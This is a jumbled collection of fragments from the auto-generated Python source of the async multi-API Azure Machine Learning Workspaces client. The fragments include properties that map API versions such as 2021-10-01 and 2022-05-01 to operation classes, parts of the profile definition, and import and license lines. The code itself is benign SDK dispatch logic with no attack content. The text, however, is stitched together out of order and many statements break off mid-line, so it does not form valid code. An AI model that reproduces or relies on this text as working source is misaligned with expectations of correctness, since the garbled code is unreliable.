operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations", "group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on", "client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate", "operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends", "= self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "else: raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client,", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0:", "client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version:", "self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version", "the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` *", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` *", "does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "\"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment':", "else: raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client,", "def metric(self): \"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version", "from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "See License.txt in the project root for # license information. # # Code", "AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version", "WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` *", "\"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as", "import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as", "depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version ==", "depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if", "from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "'1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0',", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version))", "version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from", "..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations", "group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version: *", ":class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version", "else: raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client,", "API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0':", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return", "not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self):", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else:", "is # regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01':", "'2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as", "self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise", "does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version: *", "\"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version ==", "..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version ==", "on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version:", "depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01:", "API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01:", "ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "= self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else:", "have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance", "else: raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client,", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API", "quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>`", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version", "msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports", "version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API", "version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>`", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations", "self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01':", "does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self):", "have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance", "batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>`", "models elif api_version == 'v1.0': from ..registry_discovery import models return models elif api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version))", "api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass", "def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif", ":class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version:", "self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version))", "\"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as", "import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as", ":class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version", "Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>`", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif", "not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self):", "does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments':", "the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version ==", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API", "2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "\"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return models elif api_version", "def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview:", "ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass", "import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "\"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as", "2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async", "on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API", "2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if", "raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config,", "* 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "{} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on", "depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview:", "v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass", "from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not", "on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>`", "import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as", "Workspace resources. This ready contains multiple API versions, to help you deal with", "not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self):", "2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if", "None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__(", "from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "All rights reserved. # Licensed under the MIT License. See License.txt in the", "\"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as", "version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from", "Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self", "== '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else:", "ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", ":class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version", "not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self):", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version ==", "operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from", "ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` *", "import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as", ":class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version))", "'1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does", "The ID of the target subscription. :type subscription_id: str :param api_version: API version", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API", "2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01':", ":class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations", "credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile:", "does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version: *", "license information. # # Code generated by Microsoft (R) AutoRest Code Generator. #", "the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version ==", "version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "= self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif", "from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version", "raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self):", "API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: 